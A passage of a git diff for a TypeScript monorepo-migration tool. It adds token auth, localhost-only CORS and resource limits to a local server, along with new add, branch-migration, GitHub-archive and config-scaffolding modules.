content: f.content })), - ); - } catch (error) { - logger.warn( - `Failed to process workflows: ${error instanceof Error ? error.message : String(error)}`, - ); - } - } - - // Handle file collisions (use suggested strategy for non-interactive) - for (const collision of collisions) { - const collisionFiles = await resolveFileCollisionToContent( - collision, - collision.suggestedStrategy, - repoPaths, - ); - planFiles.push( - ...collisionFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })), - ); - } - - // .gitignore - const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); - if (!hasGitignoreCollision) { - const gitignorePaths: string[] = []; - for (const r of repoPaths) { - const p = path.join(r.path, '.gitignore'); - if (await pathExists(p)) { - gitignorePaths.push(p); - } - } - let gitignoreContent = - gitignorePaths.length > 0 - ? await mergeGitignores(gitignorePaths) - : 'node_modules/\ndist/\n.DS_Store\n*.log\n'; - const pmEntries = getGitignoreEntries(pmConfig); - if (pmEntries.length > 0) { - gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; - } - planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); - } - - // README - const readmeContent = generateRootReadme( - repoPaths.map((r) => r.name), - packagesDir, - pmConfig, - ); - planFiles.push({ relativePath: 'README.md', content: readmeContent }); - - // Assemble plan - const plan: ApplyPlan = { - version: 1, - sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), - packagesDir, - rootPackageJson: workspaceConfig.rootPackageJson, - files: planFiles, - install: options.install !== false, - installCommand: pmConfig.installCommand, - analysisFindings: depAnalysis.findings, - }; - - // Write plan file await ensureDir(path.dirname(planFilePath)); - await writeJson(planFilePath, plan, { spaces: 2 }); + await writeJson(planFilePath, result.plan, { spaces: 2 }); logger.success('Plan generated successfully'); - return { 
planPath: planFilePath, plan }; + return { planPath: planFilePath, plan: result.plan }; } // ─── Apply ───────────────────────────────────────────────────────────────── @@ -558,8 +394,8 @@ export async function runApply( if (await pathExists(stagingDir)) { await removeDir(stagingDir); } - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up staging dir: ' + (err instanceof Error ? err.message : String(err))); } throw error; } @@ -713,8 +549,8 @@ export async function runPrepare( } finally { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up temp dir: ' + (err instanceof Error ? err.message : String(err))); } } } diff --git a/src/server/index.ts b/src/server/index.ts index b38766e..323f136 100755 --- a/src/server/index.ts +++ b/src/server/index.ts @@ -1,5 +1,6 @@ import http from 'node:http'; import path from 'node:path'; +import crypto from 'node:crypto'; import express from 'express'; import { WebSocketServer } from 'ws'; import type { ServerOptions } from './types.js'; @@ -13,14 +14,60 @@ import { wizardRoute } from './routes/wizard.js'; import { prepareRoute } from './routes/prepare.js'; import { configureRoute } from './routes/configure.js'; import { archiveRoute } from './routes/archive.js'; +import { addRoute } from './routes/add.js'; +import { migrateBranchRoute } from './routes/migrate-branch.js'; + +export interface ServerResult { + server: http.Server; + token: string; +} /** * Create and start the HTTP + WebSocket server. - * Returns the http.Server so callers can listen on it or close it. + * Returns the http.Server and auth token so callers can display it. 
*/ -export function createServer(options: ServerOptions): http.Server { +export function createServer(options: ServerOptions): ServerResult { const app = express(); - app.use(express.json()); + + // Generate auth token (SEC-03) + const token = crypto.randomBytes(24).toString('hex'); + + // Body size limit (SEC-06) + app.use(express.json({ limit: '50kb' })); + + // CORS - localhost only (SEC-03) + app.use((_req, res, next) => { + const origin = _req.headers.origin; + if (origin) { + const isLocalOrigin = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); + if (isLocalOrigin) { + res.setHeader('Access-Control-Allow-Origin', origin); + res.setHeader('Vary', 'Origin'); + } + } + res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE, OPTIONS'); + res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization'); + if (_req.method === 'OPTIONS') { + res.status(204).end(); + return; + } + next(); + }); + + // Auth middleware for API routes (SEC-03) + app.use('/api', (req, res, next) => { + // Allow wizard state endpoint without auth for initial UI load + if (req.path === '/wizard/state' && req.method === 'GET') { + next(); + return; + } + const authHeader = req.headers.authorization; + if (!authHeader || authHeader !== `Bearer ${token}`) { + res.status(401).json({ error: 'Unauthorized. Provide Authorization: Bearer header.' 
}); + return; + } + next(); + }); const hub = new WsHub(); @@ -34,6 +81,8 @@ export function createServer(options: ServerOptions): http.Server { app.use('/api/prepare', prepareRoute(hub)); app.use('/api/configure', configureRoute(hub)); app.use('/api/archive', archiveRoute(hub)); + app.use('/api/add', addRoute(hub)); + app.use('/api/migrate-branch', migrateBranchRoute(hub)); // Serve static UI assets if available if (options.staticDir) { @@ -47,8 +96,26 @@ export function createServer(options: ServerOptions): http.Server { const server = http.createServer(app); - // WebSocket upgrade - const wss = new WebSocketServer({ server, path: '/ws' }); + // WebSocket upgrade with auth (SEC-03) + const wss = new WebSocketServer({ noServer: true }); + server.on('upgrade', (request, socket, head) => { + // Check token in query string for WebSocket + const url = new URL(request.url || '', `http://${request.headers.host}`); + if (url.pathname !== '/ws') { + socket.destroy(); + return; + } + const wsToken = url.searchParams.get('token'); + if (wsToken !== token) { + socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n'); + socket.destroy(); + return; + } + wss.handleUpgrade(request, socket, head, (ws) => { + wss.emit('connection', ws, request); + }); + }); + wss.on('connection', (ws) => { hub.register(ws); }); @@ -59,7 +126,8 @@ export function createServer(options: ServerOptions): http.Server { wss.close(); }); - server.listen(options.port); + // Bind to loopback by default to avoid exposing the local UI server externally. + server.listen(options.port, options.host ?? 
'127.0.0.1'); - return server; + return { server, token }; } diff --git a/src/server/routes/add.ts b/src/server/routes/add.ts new file mode 100755 index 0000000..65334fa --- /dev/null +++ b/src/server/routes/add.ts @@ -0,0 +1,58 @@ +import crypto from 'node:crypto'; +import { Router } from 'express'; +import type { WsHub } from '../ws/hub.js'; +import { createWsLogger } from '../ws/logger.js'; +import { generateAddPlan, applyAddPlan } from '../../strategies/add.js'; + +export function addRoute(hub: WsHub): Router { + const router = Router(); + + router.post('/', (req, res) => { + const { repo, targetMonorepo, options } = req.body ?? {}; + + if (!repo || typeof repo !== 'string') { + res.status(400).json({ error: 'Request body must include a "repo" string' }); + return; + } + + if (!targetMonorepo || typeof targetMonorepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "targetMonorepo" string' }); + return; + } + + const opId = crypto.randomUUID(); + hub.createOperation(opId); + res.status(202).json({ opId }); + + const logger = createWsLogger(hub, opId); + + (async () => { + try { + const plan = await generateAddPlan(repo, { + to: targetMonorepo, + packagesDir: options?.packagesDir || 'packages', + conflictStrategy: options?.conflictStrategy || 'highest', + packageManager: options?.packageManager || 'pnpm', + }, logger); + + if (options?.apply) { + await applyAddPlan(plan, logger); + } + + hub.broadcast(opId, { type: 'result', data: plan, opId }); + hub.broadcast(opId, { type: 'done', opId }); + } catch (err) { + hub.broadcast(opId, { + type: 'error', + message: err instanceof Error ? 
err.message : String(err), + opId, + }); + hub.broadcast(opId, { type: 'done', opId }); + } finally { + hub.scheduleCleanup(opId); + } + })(); + }); + + return router; +} diff --git a/src/server/routes/migrate-branch.ts b/src/server/routes/migrate-branch.ts new file mode 100755 index 0000000..673232b --- /dev/null +++ b/src/server/routes/migrate-branch.ts @@ -0,0 +1,63 @@ +import crypto from 'node:crypto'; +import { Router } from 'express'; +import type { WsHub } from '../ws/hub.js'; +import { createWsLogger } from '../ws/logger.js'; +import { generateBranchPlan, applyBranchPlan } from '../../strategies/migrate-branch.js'; +import type { BranchMigrateStrategy } from '../../types/index.js'; + +export function migrateBranchRoute(hub: WsHub): Router { + const router = Router(); + + router.post('/', (req, res) => { + const { branch, sourceRepo, targetMonorepo, strategy, options } = req.body ?? {}; + + if (!branch || typeof branch !== 'string') { + res.status(400).json({ error: 'Request body must include a "branch" string' }); + return; + } + + if (!sourceRepo || typeof sourceRepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "sourceRepo" string' }); + return; + } + + if (!targetMonorepo || typeof targetMonorepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "targetMonorepo" string' }); + return; + } + + const opId = crypto.randomUUID(); + hub.createOperation(opId); + res.status(202).json({ opId }); + + const logger = createWsLogger(hub, opId); + const migrationStrategy: BranchMigrateStrategy = strategy === 'replay' ? 
'replay' : 'subtree'; + + (async () => { + try { + const plan = await generateBranchPlan( + branch, sourceRepo, targetMonorepo, + migrationStrategy, logger, + ); + + if (options?.apply) { + await applyBranchPlan(plan, options?.subdir || plan.sourceRepo, logger); + } + + hub.broadcast(opId, { type: 'result', data: plan, opId }); + hub.broadcast(opId, { type: 'done', opId }); + } catch (err) { + hub.broadcast(opId, { + type: 'error', + message: err instanceof Error ? err.message : String(err), + opId, + }); + hub.broadcast(opId, { type: 'done', opId }); + } finally { + hub.scheduleCleanup(opId); + } + })(); + }); + + return router; +} diff --git a/src/server/types.ts b/src/server/types.ts index e34d334..850e0bd 100755 --- a/src/server/types.ts +++ b/src/server/types.ts @@ -22,6 +22,8 @@ export type WsClientMessage = export interface ServerOptions { /** Port to listen on (0 for OS-assigned) */ port: number; + /** Interface to bind to. Defaults to loopback for local-only access. */ + host?: string; /** Directory containing pre-built UI assets to serve statically */ staticDir?: string; } diff --git a/src/server/wizard-state.ts b/src/server/wizard-state.ts index 9fd1a3b..9d5f69d 100755 --- a/src/server/wizard-state.ts +++ b/src/server/wizard-state.ts @@ -69,7 +69,10 @@ export async function readWizardState(baseDir?: string): Promise { const statePath = getWizardStatePath(baseDir); await ensureDir(path.dirname(statePath)); - const updated = { ...state, updatedAt: new Date().toISOString() }; + const nowMs = Date.now(); + const previousMs = Date.parse(state.updatedAt); + const nextMs = Number.isFinite(previousMs) ? 
Math.max(nowMs, previousMs + 1) : nowMs; + const updated = { ...state, updatedAt: new Date(nextMs).toISOString() }; await writeJson(statePath, updated, { spaces: 2 }); } diff --git a/src/server/ws/hub.ts b/src/server/ws/hub.ts index 7be2853..0bf16ef 100755 --- a/src/server/ws/hub.ts +++ b/src/server/ws/hub.ts @@ -5,6 +5,15 @@ import type { WsEvent, WsClientMessage } from '../types.js'; * Manages WebSocket connections, operation subscriptions, and event broadcasting. */ export class WsHub { + /** Maximum number of concurrent operations (SEC-06) */ + private static MAX_CONCURRENT = 5; + + /** Maximum buffered events per operation (SEC-06) */ + private static MAX_EVENTS = 1000; + + /** Number of currently active (non-completed) operations */ + private activeCount = 0; + /** Which opIds each client is subscribed to */ private connections = new Map>(); @@ -54,20 +63,30 @@ export class WsHub { /** * Create a new operation and return its AbortController. + * Throws if the maximum concurrent operation limit is reached (SEC-06). */ createOperation(opId: string): AbortController { + if (this.activeCount >= WsHub.MAX_CONCURRENT) { + throw new Error( + `Too many concurrent operations (max ${WsHub.MAX_CONCURRENT}). Try again later.`, + ); + } const controller = new AbortController(); this.operations.set(opId, { controller, events: [] }); + this.activeCount++; return controller; } /** * Broadcast an event to all clients subscribed to its opId, and buffer it. + * The event buffer is capped at MAX_EVENTS per operation to prevent memory exhaustion (SEC-06). */ broadcast(opId: string, event: WsEvent): void { const op = this.operations.get(opId); if (op) { - op.events.push(event); + if (op.events.length < WsHub.MAX_EVENTS) { + op.events.push(event); + } } for (const [ws, subs] of this.connections) { @@ -104,8 +123,14 @@ export class WsHub { /** * Schedule cleanup of a completed operation after a delay. + * Decrements the active operation count since the operation is done. 
*/ scheduleCleanup(opId: string, delayMs = 5 * 60 * 1000): void { + // Decrement active count when operation completes (SEC-06) + if (this.operations.has(opId) && this.activeCount > 0) { + this.activeCount--; + } + const existing = this.cleanupTimers.get(opId); if (existing) clearTimeout(existing); @@ -129,5 +154,6 @@ export class WsHub { this.cleanupTimers.clear(); this.operations.clear(); this.connections.clear(); + this.activeCount = 0; } } diff --git a/src/strategies/add.ts b/src/strategies/add.ts new file mode 100755 index 0000000..4855979 --- /dev/null +++ b/src/strategies/add.ts @@ -0,0 +1,233 @@ +import path from 'node:path'; +import { analyzeDependencies, detectFileCollisions } from '../analyzers/index.js'; +import { detectCircularDependencies, computeHotspots } from '../analyzers/graph.js'; +import { cloneOrCopyRepos } from './copy.js'; +import type { + AddPlan, + AddCommandOptions, + AnalyzeResult, + Logger, + PlanDecision, + PlanOperation, + RepoSource, + CrossDependency, +} from '../types/index.js'; +import { validateRepoSources } from '../utils/validation.js'; +import { readJson, pathExists, listDirs, createTempDir } from '../utils/fs.js'; + +/** + * Analyze an existing monorepo to discover its current packages + */ +async function discoverMonorepoPackages( + monorepoPath: string, + packagesDir: string, +): Promise { + const pkgDir = path.join(monorepoPath, packagesDir); + if (!(await pathExists(pkgDir))) return []; + const dirs = await listDirs(pkgDir); + return dirs; +} + +/** + * Detect cross-dependencies between new repo and existing packages + */ +function detectCrossDeps( + newPkgName: string, + newDeps: Record, + existingPackageNames: string[], +): CrossDependency[] { + const cross: CrossDependency[] = []; + for (const [dep, version] of Object.entries(newDeps)) { + if (existingPackageNames.includes(dep)) { + cross.push({ + fromPackage: newPkgName, + toPackage: dep, + currentVersion: version, + dependencyType: 'dependencies', + }); + } + } + 
return cross; +} + +/** + * Generate an AddPlan for adding a repository to an existing monorepo + */ +export async function generateAddPlan( + repoInput: string, + options: AddCommandOptions, + logger: Logger, +): Promise { + // Validate source + const validation = await validateRepoSources([repoInput]); + if (!validation.valid) { + throw new Error(`Invalid repository source: ${validation.errors.join(', ')}`); + } + const source: RepoSource = validation.sources[0]; + + // Check target monorepo exists + const monorepoPath = path.resolve(options.to); + if (!(await pathExists(monorepoPath))) { + throw new Error(`Target monorepo does not exist: ${monorepoPath}`); + } + const rootPkgPath = path.join(monorepoPath, 'package.json'); + if (!(await pathExists(rootPkgPath))) { + throw new Error(`No package.json found in monorepo: ${monorepoPath}`); + } + + logger.info(`Analyzing target monorepo at ${monorepoPath}`); + + // Discover existing packages + const existingPkgs = await discoverMonorepoPackages(monorepoPath, options.packagesDir); + logger.info(`Found ${existingPkgs.length} existing packages`); + + // Clone/copy the new repo into temp dir + const tempDir = await createTempDir('monotize-add-'); + logger.info(`Cloning ${source.original}...`); + const clonedRepos = await cloneOrCopyRepos([source], tempDir, { logger }); + const cloned = clonedRepos[0]; + + // Build paths array for analysis + const existingRepoPaths = existingPkgs.map((p) => ({ + path: path.join(monorepoPath, options.packagesDir, p), + name: p, + })); + const allRepoPaths = [...existingRepoPaths, { path: cloned.path, name: cloned.name }]; + + // Analyze + const depAnalysis = await analyzeDependencies(allRepoPaths); + const collisions = await detectFileCollisions([{ path: cloned.path, name: cloned.name }]); + const crossDeps = detectCrossDeps( + cloned.name, + depAnalysis.resolvedDependencies, + existingPkgs, + ); + const circular = detectCircularDependencies(crossDeps); + const hotspots = 
computeHotspots(depAnalysis.packages, depAnalysis.conflicts); + + // Read new package info + const newPkgJson = (await readJson(path.join(cloned.path, 'package.json'))) as Record< + string, + unknown + >; + const newPkgName = (newPkgJson.name as string) || source.name; + const newDeps = (newPkgJson.dependencies as Record) || {}; + const detailedCrossDeps = detectCrossDeps(newPkgName, newDeps, existingPkgs); + + // Calculate complexity + const complexityScore = Math.min( + 100, + depAnalysis.conflicts.length * 5 + collisions.length * 3 + circular.length * 10, + ); + + const analysis: AnalyzeResult = { + packages: depAnalysis.packages, + conflicts: depAnalysis.conflicts, + collisions, + crossDependencies: detailedCrossDeps, + complexityScore, + recommendations: [], + circularDependencies: circular, + hotspots, + }; + + // Generate decisions from conflicts + const decisions: PlanDecision[] = depAnalysis.conflicts.map((c) => ({ + id: `dep-${c.name}`, + kind: 'version-conflict', + chosen: c.versions[0]?.version ?? 
'unknown', + alternatives: c.versions.slice(1).map((v) => v.version), + })); + + // Generate operations + const operations: PlanOperation[] = [ + { + id: 'copy-package', + type: 'copy', + description: `Copy ${source.name} to ${options.packagesDir}/${source.name}`, + inputs: [cloned.path], + outputs: [path.join(options.packagesDir, source.name)], + }, + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json with new workspace references', + inputs: ['package.json'], + outputs: ['package.json'], + }, + { + id: 'update-workspace-config', + type: 'write', + description: 'Update workspace configuration', + inputs: [], + outputs: ['pnpm-workspace.yaml'], + }, + { + id: 'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ]; + + logger.success(`Add plan generated with ${operations.length} operations`); + + return { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: source, + targetMonorepo: monorepoPath, + packagesDir: options.packagesDir, + analysis, + decisions, + operations, + }; +} + +/** + * Apply an AddPlan to an existing monorepo + */ +export async function applyAddPlan( + plan: AddPlan, + logger: Logger, +): Promise<{ success: boolean; packageDir: string }> { + const { targetMonorepo, packagesDir, sourceRepo, operations } = plan; + + // Execute operations + for (const op of operations) { + logger.info(`Executing: ${op.description}`); + + switch (op.type) { + case 'copy': { + const { copyDir, ensureDir } = await import('../utils/fs.js'); + const destDir = path.join(targetMonorepo, packagesDir, sourceRepo.name); + await ensureDir(destDir); + if (op.inputs[0]) { + await copyDir(op.inputs[0], destDir); + } + break; + } + case 'write': { + const rootPkgPath = path.join(targetMonorepo, 'package.json'); + const rootPkg = (await readJson(rootPkgPath)) as Record; + const workspaces = rootPkg.workspaces as string[] | undefined; + if (workspaces && 
!workspaces.includes(`${packagesDir}/${sourceRepo.name}`)) { + workspaces.push(`${packagesDir}/${sourceRepo.name}`); + workspaces.sort(); + } + const { writeJson } = await import('../utils/fs.js'); + await writeJson(rootPkgPath, rootPkg); + break; + } + case 'exec': { + logger.info('Skipping install step (run manually after reviewing changes)'); + break; + } + } + } + + const packageDir = path.join(targetMonorepo, packagesDir, sourceRepo.name); + logger.success(`Added ${sourceRepo.name} to ${packageDir}`); + return { success: true, packageDir }; +} diff --git a/src/strategies/archive.ts b/src/strategies/archive.ts new file mode 100755 index 0000000..35c3d6d --- /dev/null +++ b/src/strategies/archive.ts @@ -0,0 +1,135 @@ +import type { ArchivePlan, Logger, RepoSource } from '../types/index.js'; +import { validateRepoSources } from '../utils/validation.js'; + +/** + * Generate a README deprecation patch for a single repo. + * This works without any token - it's just text generation. + */ +export function generateReadmeDeprecationPatch( + repoName: string, + monorepoUrl: string, +): string { + const notice = [ + `# ${repoName}`, + '', + `> **Note:** This repository has been migrated to a monorepo.`, + `> All future development happens at [${monorepoUrl}](${monorepoUrl}).`, + '', + '## Migration Notice', + '', + `This repository is **archived** and no longer maintained independently.`, + `The code now lives in the monorepo at:`, + '', + ` ${monorepoUrl}`, + '', + 'Please file issues and submit pull requests there.', + '', + ].join('\n'); + + // Generate unified diff + const lines = [ + `--- a/README.md`, + `+++ b/README.md`, + `@@ -1,1 +1,${notice.split('\n').length} @@`, + ...notice.split('\n').map((l) => `+${l}`), + ]; + + return lines.join('\n'); +} + +/** + * Generate an ArchivePlan for deprecating old repositories + */ +export async function generateArchivePlan( + repoInputs: string[], + monorepoUrl: string, + options: { tokenFromEnv?: boolean } = {}, +): Promise 
{ + const validation = await validateRepoSources(repoInputs); + if (!validation.valid) { + throw new Error(`Invalid repository sources: ${validation.errors.join(', ')}`); + } + + const repos = validation.sources.map((source: RepoSource) => ({ + name: source.name, + url: source.resolved, + readmePatch: generateReadmeDeprecationPatch(source.name, monorepoUrl), + })); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos, + monorepoUrl, + }; + + // Only include API operations if token will be available + if (options.tokenFromEnv) { + plan.apiOperations = validation.sources.map((source: RepoSource) => ({ + repo: source.original, + action: 'archive' as const, + })); + } + + return plan; +} + +/** + * Apply archive operations via the GitHub API. + * Token is read from environment variable only, NEVER persisted. + */ +export async function applyArchiveViaGitHubApi( + plan: ArchivePlan, + logger: Logger, +): Promise<{ applied: string[]; failed: Array<{ repo: string; error: string }> }> { + const token = process.env.GITHUB_TOKEN || process.env.GH_TOKEN; + if (!token) { + throw new Error( + 'GitHub token required. Set GITHUB_TOKEN or GH_TOKEN environment variable.', + ); + } + + const applied: string[] = []; + const failed: Array<{ repo: string; error: string }> = []; + + for (const op of plan.apiOperations ?? 
[]) { + logger.info(`Archiving ${op.repo} via GitHub API...`); + + try { + // Parse owner/repo from the repo string + const match = op.repo.match(/(?:github\.com\/)?([^/]+)\/([^/.]+)/); + if (!match) { + failed.push({ repo: op.repo, error: 'Could not parse owner/repo' }); + continue; + } + const [, owner, repo] = match; + + if (op.action === 'archive') { + const response = await fetch(`https://api.github.com/repos/${owner}/${repo}`, { + method: 'PATCH', + headers: { + Authorization: `Bearer ${token}`, + Accept: 'application/vnd.github+json', + 'X-GitHub-Api-Version': '2022-11-28', + }, + body: JSON.stringify({ archived: true }), + }); + + if (!response.ok) { + const body = await response.text(); + failed.push({ repo: op.repo, error: `HTTP ${response.status}: ${body}` }); + continue; + } + } + + applied.push(op.repo); + logger.success(`Archived ${op.repo}`); + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + failed.push({ repo: op.repo, error: msg }); + logger.error(`Failed to archive ${op.repo}: ${msg}`); + } + } + + return { applied, failed }; +} diff --git a/src/strategies/configure.ts b/src/strategies/configure.ts new file mode 100755 index 0000000..e990a04 --- /dev/null +++ b/src/strategies/configure.ts @@ -0,0 +1,260 @@ +import path from 'node:path'; +import type { ConfigPlan, ConfigPatch, Logger } from '../types/index.js'; +import { pathExists, readFile, writeFile, ensureDir } from '../utils/fs.js'; + +export interface ConfigureOptions { + workspaceTool?: 'turbo' | 'nx' | 'none'; + packageManager?: string; +} + +/** + * Generate a ConfigPlan for workspace scaffolding. + * Only generates safe JSON/YAML configs. Flags executable configs as warnings. 
+ */ +export async function generateConfigPlan( + monorepoDir: string, + packageNames: string[], + packagesDir: string, + _options: ConfigureOptions = {}, + logger?: Logger, +): Promise { + const patches: ConfigPatch[] = []; + const warnings: ConfigPlan['warnings'] = []; + + // Scaffold Prettier + const prettierPatches = await scaffoldPrettier(monorepoDir, packageNames, packagesDir); + patches.push(...prettierPatches); + + // Scaffold ESLint + const { patches: eslintPatches, warnings: eslintWarnings } = await scaffoldEslint( + monorepoDir, + packageNames, + packagesDir, + ); + patches.push(...eslintPatches); + warnings.push(...eslintWarnings); + + // Scaffold TypeScript + const tsPatches = await scaffoldTypescript(monorepoDir, packageNames, packagesDir, logger); + patches.push(...tsPatches); + + logger?.info(`ConfigPlan: ${patches.length} patches, ${warnings.length} warnings`); + + return { + schemaVersion: 1, + createdAt: new Date().toISOString(), + patches, + warnings, + }; +} + +/** + * Scaffold Prettier config: root .prettierrc.json + */ +async function scaffoldPrettier( + monorepoDir: string, + _packageNames: string[], + _packagesDir: string, +): Promise { + const patches: ConfigPatch[] = []; + const rootConfig = path.join(monorepoDir, '.prettierrc.json'); + + if (!(await pathExists(rootConfig))) { + const content = JSON.stringify( + { + semi: true, + singleQuote: true, + trailingComma: 'all', + printWidth: 100, + tabWidth: 2, + }, + null, + 2, + ); + patches.push({ + path: '.prettierrc.json', + after: content, + description: 'Root Prettier configuration (JSON, safe to edit)', + }); + } + + // .prettierignore + const ignorePath = path.join(monorepoDir, '.prettierignore'); + if (!(await pathExists(ignorePath))) { + patches.push({ + path: '.prettierignore', + after: 'dist\nnode_modules\ncoverage\n*.min.js\n', + description: 'Prettier ignore file', + }); + } + + return patches; +} + +/** + * Scaffold ESLint config. Only generates JSON configs. 
+ * JS/CJS configs are flagged as warnings. + */ +async function scaffoldEslint( + monorepoDir: string, + packageNames: string[], + packagesDir: string, +): Promise<{ patches: ConfigPatch[]; warnings: ConfigPlan['warnings'] }> { + const patches: ConfigPatch[] = []; + const warnings: ConfigPlan['warnings'] = []; + + // Check for existing JS configs + for (const ext of ['.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs']) { + if (await pathExists(path.join(monorepoDir, ext))) { + warnings.push({ + config: `ESLint (${ext})`, + reason: 'Executable config file cannot be safely auto-merged', + suggestion: 'Manually review and consolidate ESLint configuration', + }); + return { patches, warnings }; + } + } + + // Check per-package for JS configs + for (const pkg of packageNames) { + const pkgDir = path.join(monorepoDir, packagesDir, pkg); + for (const ext of ['.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs']) { + if (await pathExists(path.join(pkgDir, ext))) { + warnings.push({ + config: `ESLint in ${pkg} (${ext})`, + reason: 'Per-package executable ESLint config requires manual review', + suggestion: `Migrate ${pkg}/${ext} to JSON format or consolidate at root`, + }); + } + } + } + + // Generate root JSON config if none exists + const rootConfig = path.join(monorepoDir, '.eslintrc.json'); + if (!(await pathExists(rootConfig))) { + const content = JSON.stringify( + { + root: true, + env: { node: true, es2022: true }, + extends: ['eslint:recommended'], + parserOptions: { ecmaVersion: 'latest', sourceType: 'module' }, + rules: {}, + }, + null, + 2, + ); + patches.push({ + path: '.eslintrc.json', + after: content, + description: 'Root ESLint configuration (JSON, safe to edit)', + }); + } + + return { patches, warnings }; +} + +/** + * Scaffold TypeScript configs: root tsconfig.json with references, + * per-package composite:true. 
+ */ +async function scaffoldTypescript( + monorepoDir: string, + packageNames: string[], + packagesDir: string, + _logger?: Logger, +): Promise { + const patches: ConfigPatch[] = []; + + // Detect which packages have TypeScript + const tsPackages: string[] = []; + for (const pkg of packageNames) { + const pkgTsconfig = path.join(monorepoDir, packagesDir, pkg, 'tsconfig.json'); + if (await pathExists(pkgTsconfig)) { + tsPackages.push(pkg); + } + } + + if (tsPackages.length === 0) return patches; + + // Generate root tsconfig.json with project references + const rootTsconfig = path.join(monorepoDir, 'tsconfig.json'); + if (!(await pathExists(rootTsconfig))) { + const references = tsPackages.map((pkg) => ({ + path: `./${packagesDir}/${pkg}`, + })); + const content = JSON.stringify( + { + compilerOptions: { + target: 'ES2022', + module: 'ESNext', + moduleResolution: 'bundler', + strict: true, + esModuleInterop: true, + skipLibCheck: true, + declaration: true, + declarationMap: true, + sourceMap: true, + composite: true, + }, + references, + files: [], + }, + null, + 2, + ); + patches.push({ + path: 'tsconfig.json', + after: content, + description: 'Root TypeScript configuration with project references', + }); + } + + // Update per-package tsconfig.json to add composite: true + for (const pkg of tsPackages) { + const pkgTsconfigPath = path.join(monorepoDir, packagesDir, pkg, 'tsconfig.json'); + try { + const before = await readFile(pkgTsconfigPath); + const config = JSON.parse(before) as Record; + const compilerOptions = (config.compilerOptions as Record) || {}; + + if (!compilerOptions.composite) { + compilerOptions.composite = true; + config.compilerOptions = compilerOptions; + const after = JSON.stringify(config, null, 2); + patches.push({ + path: `${packagesDir}/${pkg}/tsconfig.json`, + before, + after, + description: `Enable composite mode in ${pkg} for project references`, + }); + } + } catch { + // Skip unparseable tsconfig + } + } + + return patches; +} + +/** 
+ * Apply a ConfigPlan to disk (transactional writes). + */ +export async function applyConfigPlan( + plan: ConfigPlan, + monorepoDir: string, + logger?: Logger, +): Promise { + // Sort patches for deterministic ordering + const sorted = [...plan.patches].sort((a, b) => a.path.localeCompare(b.path)); + + for (const patch of sorted) { + const fullPath = path.join(monorepoDir, patch.path); + await ensureDir(path.dirname(fullPath)); + await writeFile(fullPath, patch.after); + logger?.info(`Wrote ${patch.path}: ${patch.description}`); + } + + for (const warning of plan.warnings) { + logger?.warn(`${warning.config}: ${warning.reason}. ${warning.suggestion}`); + } +} diff --git a/src/strategies/copy.ts b/src/strategies/copy.ts index 678190f..bdcf95c 100755 --- a/src/strategies/copy.ts +++ b/src/strategies/copy.ts @@ -3,6 +3,7 @@ import simpleGit from 'simple-git'; import type { RepoSource, Logger } from '../types/index.js'; import { copyDir, ensureDir, pathExists, removeDir } from '../utils/fs.js'; import { redactUrl } from '../utils/redact.js'; +import { pMap } from '../utils/concurrency.js'; /** * Options for cloning/copying repositories @@ -16,6 +17,10 @@ export interface CopyOptions { cloneTimeout?: number; /** Number of retries for transient failures (default: 3) */ maxRetries?: number; + /** Use shallow clone (--depth 1) for faster cloning. Set to false when preserving history. 
Default: true */ + shallow?: boolean; + /** Max concurrent clone/copy operations (default: 4) */ + concurrency?: number; } /** @@ -145,9 +150,9 @@ async function cloneRepo( url: string, targetDir: string, logger: Logger, - options: { timeout?: number; maxRetries?: number } = {} + options: { timeout?: number; maxRetries?: number; shallow?: boolean } = {} ): Promise { - const { timeout = 60000, maxRetries = 3 } = options; + const { timeout = 60000, maxRetries = 3, shallow = true } = options; const git = simpleGit({ timeout: { @@ -161,7 +166,8 @@ async function cloneRepo( try { logger.debug(`Cloning ${redactUrl(url)} to ${targetDir} (attempt ${attempt}/${maxRetries})`); - await git.clone(url, targetDir, ['--depth', '1']); + const cloneArgs = shallow ? ['--depth', '1'] : []; + await git.clone(url, targetDir, cloneArgs); logger.debug(`Successfully cloned ${redactUrl(url)}`); return; @@ -207,7 +213,8 @@ async function copyLocalRepo( await copyDir(sourcePath, targetDir, { filter: (src) => { const basename = path.basename(src); - return !EXCLUDE_PATTERNS.includes(basename); + // Exclude known build/tool dirs and macOS resource fork files (._*) + return !EXCLUDE_PATTERNS.includes(basename) && !basename.startsWith('._'); }, }); @@ -222,7 +229,7 @@ export async function cloneOrCopyRepo( targetDir: string, options: CopyOptions ): Promise { - const { logger, cloneTimeout = 60000, maxRetries = 3 } = options; + const { logger, cloneTimeout = 60000, maxRetries = 3, shallow = true } = options; await ensureDir(targetDir); @@ -238,6 +245,7 @@ export async function cloneOrCopyRepo( await cloneRepo(source.resolved, targetDir, logger, { timeout: cloneTimeout, maxRetries, + shallow, }); } } @@ -250,24 +258,27 @@ export async function cloneOrCopyRepos( tempDir: string, options: CopyOptions ): Promise> { - const { logger } = options; - const results: Array<{ path: string; name: string }> = []; - - for (const source of sources) { - const targetDir = path.join(tempDir, source.name); - - 
